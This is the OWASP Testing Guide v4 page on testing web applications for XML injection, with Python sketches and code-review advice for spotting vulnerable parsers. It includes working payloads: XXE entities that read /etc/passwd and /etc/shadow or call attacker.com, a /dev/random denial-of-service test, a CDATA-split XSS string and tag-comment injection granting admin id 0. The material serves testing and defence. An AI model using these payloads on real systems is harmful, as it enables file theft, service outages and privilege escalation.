
Difference between revisions of "Testing for XML Injection (OTG-INPVAL-008)"


Latest revision as of 21:14, 11 September 2017

This article is part of the new OWASP Testing Guide v4.

Summary

XML Injection testing checks whether a tester can inject an XML document or fragment into the application. If the XML parser fails to contextually validate the data, the test yields a positive result.


This section describes practical examples of XML Injection. First, an XML-style communication is defined and its working principles are explained. Then the discovery method is described, in which we try to insert XML metacharacters. Once this first step is accomplished, the tester will have some information about the XML structure, so it will be possible to try to inject XML data and tags (Tag Injection).


How to Test

Let's suppose there is a web application that uses XML-style communication to perform user registration. This is done by creating a new <user> node and adding it to an xmlDB file.


Let's suppose the xmlDB file looks like the following:

<?xml version="1.0" encoding="ISO-8859-1"?> 
<users> 
	<user> 
		<username>gandalf</username> 
		<password>!c3</password> 
		<userid>0</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>Stefan0</username> 
		<password>w1s3c</password> 
		<userid>500</userid>
		<mail>[email protected]</mail>
	</user> 
</users>


When a user registers by filling in an HTML form, the application receives the user's data in a standard request which, for the sake of simplicity, is assumed to be sent as a GET request.


For example, the following values:

Username: tony
Password: Un6R34kb!e
E-mail: [email protected]

will produce the request:

http://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&[email protected]


The application, then, builds the following node:

<user> 
	<username>tony</username> 
	<password>Un6R34kb!e</password> 
	<userid>500</userid>
	<mail>[email protected]</mail>
</user>


which will be added to the xmlDB:

<?xml version="1.0" encoding="ISO-8859-1"?> 
<users> 
	<user> 
		<username>gandalf</username> 
		<password>!c3</password> 
		<userid>0</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>Stefan0</username> 
		<password>w1s3c</password> 
		<userid>500</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>tony</username> 
		<password>Un6R34kb!e</password> 
		<userid>500</userid>
		<mail>[email protected]</mail>
	</user> 
</users>
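
The registration flow above can be sketched as follows. This is only an illustrative sketch: the source does not show the code of addUser.php, so the function names `build_user_node` and `add_user`, the shortened one-user database, and the example.com mail addresses are all assumptions. What it demonstrates is the pattern that makes the attacks in the following sections possible: the node is assembled by string concatenation, with no escaping of user input.

```python
# Hypothetical re-creation of the registration logic; the real addUser.php
# is not shown in the source, so every name below is an assumption.
XML_DB = (
    "<users>"
    "<user><username>gandalf</username><password>!c3</password>"
    "<userid>0</userid><mail>gandalf@example.com</mail></user>"
    "</users>"
)


def build_user_node(username, password, mail, userid=500):
    """Build a <user> node by plain string concatenation (no escaping)."""
    return (
        "<user>"
        f"<username>{username}</username>"
        f"<password>{password}</password>"
        f"<userid>{userid}</userid>"
        f"<mail>{mail}</mail>"
        "</user>"
    )


def add_user(xml_db, username, password, mail):
    """Insert the new node just before the closing </users> tag."""
    node = build_user_node(username, password, mail)
    head, closing_tag, tail = xml_db.rpartition("</users>")
    return head + node + closing_tag + tail


new_db = add_user(XML_DB, "tony", "Un6R34kb!e", "tony@example.com")
print(new_db)
```

With benign input the result is the expected database with one more <user> node. Because nothing is escaped, any metacharacter in the three parameters ends up verbatim in the document.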


Discovery

The first step in testing an application for the presence of an XML Injection vulnerability consists of trying to insert XML metacharacters.


XML metacharacters are:

  • Single quote: ' - When not sanitized, this character can cause an exception during XML parsing if the injected value becomes part of an attribute value in a tag.

As an example, let's suppose there is the following attribute:

<node attrib='$inputValue'/>

So, if:

$inputValue = foo'

is instantiated and then inserted as the attrib value:

<node attrib='foo''/>

then, the resulting XML document is not well formed.

  • Double quote: " - This character has the same effect as the single quote and can be used if the attribute value is enclosed in double quotes.

<node attrib="$inputValue"/>

So if:

$inputValue = foo"

the substitution gives:

<node attrib="foo""/>

and the resulting XML document is not well formed.

  • Angle brackets: > and < - By adding an opening or closing angle bracket to a user input like the following:

Username = foo<

the application will build a new node:

<user> 
     <username>foo<</username> 
     <password>Un6R34kb!e</password> 
     <userid>500</userid>
     <mail>[email protected]</mail>
</user>

but, because of the unescaped '<', the resulting XML document is not well formed.


  • Comment tag: <!--/--> - These character sequences are interpreted as the beginning and end of a comment. So, by injecting one of them in the Username parameter:

Username = foo<!--

the application will build a node like the following:

<user> 
    <username>foo<!--</username> 
    <password>Un6R34kb!e</password> 
    <userid>500</userid>
    <mail>[email protected]</mail>
</user>

which is not well formed, because the comment is never closed.

  • Ampersand: & - The ampersand is used in XML syntax to introduce entity references. An entity reference has the form '&symbol;' and is replaced by the text the entity is mapped to, typically a single character.

For example:

<tagnode>&lt;</tagnode>

is well formed and valid, and represents the '<' character.

If '&' itself is not encoded as &amp;, it can be used to test for XML injection.

In fact, if an input like the following is provided:

Username = &foo

a new node will be created:

<user> 
<username>&foo</username> 
<password>Un6R34kb!e</password> 
<userid>500</userid>
<mail>[email protected]</mail>
</user>

but, again, the document is not well formed: &foo is not terminated with ';', and the &foo; entity is undefined.


  • CDATA section delimiters: <![CDATA[ / ]]> - CDATA sections are used to escape blocks of text containing characters that would otherwise be recognized as markup. In other words, characters enclosed in a CDATA section are not interpreted as markup by the XML parser.

For example, if there is the need to represent the string '<foo>' inside a text node, a CDATA section may be used:

<node>
    <![CDATA[<foo>]]>
</node>

so that '<foo>' won't be parsed as markup and will be considered as character data.

If a node is built in the following way:

<username><![CDATA[$userName]]></username>

the tester could try to inject the CDATA end string ']]>' in order to invalidate the XML document.

$userName = ]]>

this will become:

<username><![CDATA[]]>]]></username>

which is not a well-formed XML fragment.
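
The metacharacter probes listed above can be checked locally with a short script. This is a sketch under assumptions: it models what the server-side parser would see by substituting each payload into the same templates used in the examples, and it uses Python's standard xml.etree.ElementTree as a stand-in for whatever parser the target application really uses. The names `PROBES`, `is_well_formed`, and `run_probes` are illustrative only.

```python
import xml.etree.ElementTree as ET

# Templates mirror the snippets above; "{v}" marks where user input lands.
PROBES = [
    ("single quote", "<node attrib='{v}'/>", "foo'"),
    ("double quote", '<node attrib="{v}"/>', 'foo"'),
    ("angle bracket", "<username>{v}</username>", "foo<"),
    ("comment start", "<username>{v}</username>", "foo<!--"),
    ("ampersand", "<username>{v}</username>", "&foo"),
    ("CDATA end", "<username><![CDATA[{v}]]></username>", "]]>"),
]


def is_well_formed(document):
    """Return True if the parser accepts the document, False otherwise."""
    try:
        ET.fromstring(document)
        return True
    except ET.ParseError:
        return False


def run_probes():
    """Map each probe name to (baseline accepted, injected accepted)."""
    results = {}
    for name, template, payload in PROBES:
        baseline_ok = is_well_formed(template.format(v="foo"))
        injected_ok = is_well_formed(template.format(v=payload))
        results[name] = (baseline_ok, injected_ok)
    return results


for name, (baseline_ok, injected_ok) in run_probes().items():
    print(f"{name}: baseline accepted={baseline_ok}, injected accepted={injected_ok}")
```

In a real test the tester only observes the application's response, so a parser error message, a generic error page, or a missing record after submitting one of these payloads plays the role of the ParseError caught here.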


Another test involves CDATA sections. Suppose that the XML document is processed to generate an HTML page. In this case, the CDATA section delimiters may simply be stripped without further inspection of their contents. It is then possible to inject HTML tags that will be included in the generated page, completely bypassing existing sanitization routines.


Let's consider a concrete example. Suppose we have a node containing some text that will be displayed back to the user.

 <html>
 $HTMLCode
 </html>

Then, an attacker can provide the following input:

$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>

and obtain the following node:

<html>
  <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
 </html>

During the processing, the CDATA section delimiters are eliminated, generating the following HTML code:

<script>alert('xss')</script>

The result is that the application is vulnerable to XSS.
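
The CDATA bypass can be reproduced with a few lines of Python. This is a minimal sketch, assuming a hypothetical input filter (`naive_filter_allows`) that only looks for a literal `<script` substring; the source does not say how the real sanitization routine works. The parser used is the standard xml.etree.ElementTree, which joins the contents of adjacent CDATA sections and plain text into a single text value.

```python
import xml.etree.ElementTree as ET


def naive_filter_allows(value):
    """Hypothetical input filter: reject only a literal '<script' substring."""
    return "<script" not in value.lower()


# The payload from the example above, split so that '<script' never appears.
payload = (
    "<![CDATA[<]]>script<![CDATA[>]]>alert('xss')"
    "<![CDATA[<]]>/script<![CDATA[>]]>"
)

node = ET.fromstring(f"<html>{payload}</html>")

# After parsing, the CDATA delimiters are gone and the pieces are joined.
rendered = node.text

print("filter accepts payload:", naive_filter_allows(payload))
print("text after parsing:", rendered)
```

The filter accepts the payload because the markup characters are hidden inside separate CDATA sections, yet the text that reaches the HTML generator is a complete script element. Output encoding applied after XML processing, rather than input filtering before it, is what stops this variant.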


External Entity: The set of valid entities can be extended by defining new entities. If the definition of an entity is a URI, the entity is called an external entity. Unless configured to do otherwise, external entities force the XML parser to access the resource specified by the URI, e.g., a file on the local machine or on a remote system. This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to perform denial of service of the local system, gain unauthorized access to files on the local machine, scan remote machines, and perform denial of service of remote systems.


To test for XXE vulnerabilities, one can use the following input:

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>


This test could crash the web server (on a UNIX system) if the XML parser attempts to substitute the entity with the contents of the /dev/random file, which has no end.


Other useful tests are the following:


 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>
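
Since the test documents above differ only in the URI of the external entity, they can be generated from one template. The sketch below is a convenience for the tester, not part of the original guide: the names `XXE_TEMPLATE`, `TARGET_URIS`, and `xxe_payload` are assumptions, and the /dev/random case is left out of the list on purpose because it is a denial-of-service test.

```python
# Template copied from the test documents above; only the URI varies.
XXE_TEMPLATE = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    "<!DOCTYPE foo [\n"
    "  <!ELEMENT foo ANY >\n"
    '  <!ENTITY xxe SYSTEM "{uri}" >]><foo>&xxe;</foo>'
)

# URIs taken from the examples above.
TARGET_URIS = [
    "file:///etc/passwd",
    "file:///etc/shadow",
    "file:///c:/boot.ini",
    "http://www.attacker.com/text.txt",
]


def xxe_payload(uri):
    """Return an XXE test document whose entity points at the given URI."""
    if '"' in uri:
        # A double quote would terminate the system identifier early.
        raise ValueError("URI must not contain a double quote")
    return XXE_TEMPLATE.format(uri=uri)


payloads = [xxe_payload(uri) for uri in TARGET_URIS]
for document in payloads:
    print(document)
    print()
```

Each generated document is then submitted wherever the application accepts XML, and the response is inspected for the contents of the referenced resource or for an error that reveals the parser's behavior.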


Tag Injection

Once the first step is accomplished, the tester will have some information about the structure of the XML document. Then, it is possible to try to inject XML data and tags. We will show an example of how this can lead to a privilege escalation attack.


Let's consider the previous application. By inserting the following values:

Username: tony
Password: Un6R34kb!e
E-mail: [email protected]</mail><userid>0</userid><mail>[email protected]

the application will build a new node and append it to the XML database:

<?xml version="1.0" encoding="ISO-8859-1"?> 
<users> 
	<user> 
		<username>gandalf</username> 
		<password>!c3</password> 
		<userid>0</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>Stefan0</username> 
		<password>w1s3c</password> 
		<userid>500</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>tony</username> 
		<password>Un6R34kb!e</password> 
		<userid>500</userid>
		<mail>[email protected]</mail><userid>0</userid><mail>[email protected]</mail>
	</user> 
</users>


The resulting XML file is well formed. Furthermore, it is likely that, for the user tony, the value associated with the userid tag is the one appearing last, i.e., 0 (the admin ID). In other words, we have injected a user with administrative privileges.
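
The effect of the injected tags can be checked with a small script. This is a sketch under assumptions: `build_user_node` is a hypothetical stand-in for the unescaped string concatenation the application is presumed to perform, the example.com address replaces the real mail value, and the "last value wins" lookup models a reader that keeps the final userid it encounters, which is only one possible behavior.

```python
import xml.etree.ElementTree as ET


def build_user_node(username, password, mail, userid=500):
    """Hypothetical vulnerable builder: concatenates input without escaping."""
    return (
        "<user>"
        f"<username>{username}</username>"
        f"<password>{password}</password>"
        f"<userid>{userid}</userid>"
        f"<mail>{mail}</mail>"
        "</user>"
    )


# The E-mail field closes <mail>, adds a second <userid>, and reopens <mail>.
injected_mail = "tony@example.com</mail><userid>0</userid><mail>tony@example.com"

node = ET.fromstring(build_user_node("tony", "Un6R34kb!e", injected_mail))

userids = [element.text for element in node.findall("userid")]
effective_userid = userids[-1]  # assumed "last value wins" behavior

print("userid values in document order:", userids)
print("userid seen by a last-value-wins reader:", effective_userid)
```

A reader that takes the first userid instead would still see 500, so whether the escalation succeeds depends on how the application reads the node back.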


The only problem is that the userid tag appears twice in the last user node. Often, XML documents are associated with a schema or a DTD and will be rejected if they don't comply with it.


Let's suppose that the XML document is specified by the following DTD:

<!DOCTYPE users [
	  <!ELEMENT users (user+) >
	  <!ELEMENT user (username,password,userid,mail+) >
	  <!ELEMENT username (#PCDATA) >
	  <!ELEMENT password (#PCDATA) >
	  <!ELEMENT userid (#PCDATA) >
	  <!ELEMENT mail (#PCDATA) >
]>


Note that the userid node is defined with cardinality 1. In this case, the attack we have shown before (and other simple attacks) will not work, if the XML document is validated against its DTD before any processing occurs.


However, this problem can be solved if the tester controls the values of the nodes that surround the offending node (userid, in this example). In fact, the tester can comment out that node by injecting a comment start/end sequence:


Username: tony
Password: Un6R34kb!e</password><!--
E-mail: --><userid>0</userid><mail>[email protected]

In this case, the final XML database is:

<?xml version="1.0" encoding="ISO-8859-1"?> 
<users> 
	<user> 
		<username>gandalf</username> 
		<password>!c3</password> 
		<userid>0</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>Stefan0</username> 
		<password>w1s3c</password> 
		<userid>500</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>tony</username> 
		<password>Un6R34kb!e</password><!--</password> 
		<userid>500</userid>
		<mail>--><userid>0</userid><mail>[email protected]</mail>
	</user>
</users>


The original userid node has been commented out, leaving only the injected one. The document now complies with its DTD rules.
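
The difference between the two injections can be verified against the content model of the user element. The sketch below makes several assumptions: `build_user_node` is a hypothetical stand-in for the application's string concatenation, the mail addresses are placeholders, and `matches_content_model` is a hand-rolled check of the (username,password,userid,mail+) sequence, because Python's standard library does not perform DTD validation.

```python
import re
import xml.etree.ElementTree as ET


def build_user_node(username, password, mail, userid=500):
    """Hypothetical vulnerable builder: concatenates input without escaping."""
    return (
        "<user>"
        f"<username>{username}</username>"
        f"<password>{password}</password>"
        f"<userid>{userid}</userid>"
        f"<mail>{mail}</mail>"
        "</user>"
    )


def matches_content_model(user):
    """Stand-in for DTD validation of (username,password,userid,mail+)."""
    tags = "".join(child.tag + "," for child in user)
    return re.fullmatch(r"username,password,userid,(mail,)+", tags) is not None


# Simple tag injection: the duplicate userid violates the content model.
simple = ET.fromstring(build_user_node(
    "tony",
    "Un6R34kb!e",
    "tony@example.com</mail><userid>0</userid><mail>tony@example.com",
))

# Comment injection: the original userid ends up inside a comment.
commented = ET.fromstring(build_user_node(
    "tony",
    "Un6R34kb!e</password><!--",
    "--><userid>0</userid><mail>tony@example.com",
))

print("simple injection fits the DTD model:", matches_content_model(simple))
print("comment injection fits the DTD model:", matches_content_model(commented))
print("userid after comment injection:", commented.findtext("userid"))
```

The comment injection leaves exactly one userid element, so a validating parser has no structural reason to reject the node.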

Source Code Review

The following Java APIs may be vulnerable to XXE if they are not configured properly.

  • javax.xml.parsers.DocumentBuilder
  • javax.xml.parsers.DocumentBuilderFactory
  • org.xml.sax.EntityResolver
  • org.dom4j.*
  • javax.xml.parsers.SAXParser
  • javax.xml.parsers.SAXParserFactory
  • TransformerFactory
  • SAXReader
  • DocumentHelper
  • SAXBuilder
  • XMLReaderFactory
  • XMLInputFactory
  • SchemaFactory
  • DocumentBuilderFactoryImpl
  • SAXTransformerFactory
  • XMLReader
  • Xerces: DOMParser, DOMParserImpl, SAXParser, XMLParser

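Check the source code to verify that DOCTYPE declarations, external DTDs, and external parameter entities are disabled or forbidden. The OWASP XML External Entity (XXE) Prevention Cheat Sheet (https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet) describes the relevant settings.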
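
The idea of forbidding DOCTYPE declarations can be illustrated in a few lines. The APIs listed above are Java and C/C++ ones; the sketch below is only a Python analogue built on the standard xml.parsers.expat module, and the names `DoctypeForbidden` and `parse_without_doctype` are assumptions made for this example. It rejects a document as soon as the parser reports a DOCTYPE declaration, before any entity could be resolved.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def parse_without_doctype(data):
    """Parse XML bytes, refusing any document that declares a DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Called by expat when it encounters <!DOCTYPE ...>.
        raise DoctypeForbidden(f"DOCTYPE declaration not allowed: {name}")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(data, True)
    return True


benign = b"<foo>ok</foo>"
xxe_test = (
    b'<?xml version="1.0" encoding="ISO-8859-1"?>'
    b'<!DOCTYPE foo [<!ELEMENT foo ANY >'
    b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>'
)

print("benign document accepted:", parse_without_doctype(benign))
try:
    parse_without_doctype(xxe_test)
except DoctypeForbidden as error:
    print("XXE test document rejected:", error)
```

During a code review, the thing to look for is the equivalent of this handler in the parser actually used: a setting or callback that makes the parser fail, or skip resolution, when a DOCTYPE or an external entity appears.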

In addition, the Apache POI library for reading Office documents may be vulnerable to XXE if its version is lower than 3.10.1.

The version of the POI library can be identified from the file name of the JAR. For example:

  • poi-3.8.jar
  • poi-ooxml-3.8.jar
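
The file-name check described above is easy to automate when reviewing a deployment. The following is a rough sketch: the 3.10.1 threshold comes from the text, while the regular expression, the function names, and the assumption that JAR names follow the poi-<module>-<version>.jar pattern are illustrative choices. A JAR that has been renamed will not be recognized.

```python
import re

# First version stated in the text as no longer affected.
FIXED_IN = (3, 10, 1)


def poi_version(jar_name):
    """Extract the numeric version from a POI JAR file name, or None."""
    match = re.match(r"poi(?:-[a-z]+)*-(\d+(?:\.\d+)*)", jar_name)
    if match is None:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def may_be_vulnerable(jar_name):
    """True if the name looks like a POI JAR older than the fixed version."""
    version = poi_version(jar_name)
    return version is not None and version < FIXED_IN


for name in ["poi-3.8.jar", "poi-ooxml-3.8.jar", "poi-3.10.1.jar"]:
    print(name, "->", may_be_vulnerable(name))
```

Versions are compared as tuples of integers, so 3.8 sorts before 3.10.1, which a plain string comparison would get wrong.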

The following source code keywords may apply to C and C++.

  • libxml2: xmlCtxtReadMemory, xmlCtxtUseOptions, xmlParseInNodeContext, xmlReadDoc, xmlReadFd, xmlReadFile, xmlReadIO, xmlReadMemory, xmlCtxtReadDoc, xmlCtxtReadFd, xmlCtxtReadFile, xmlCtxtReadIO
  • libxerces-c: XercesDOMParser, SAXParser, SAX2XMLReader

References

Whitepapers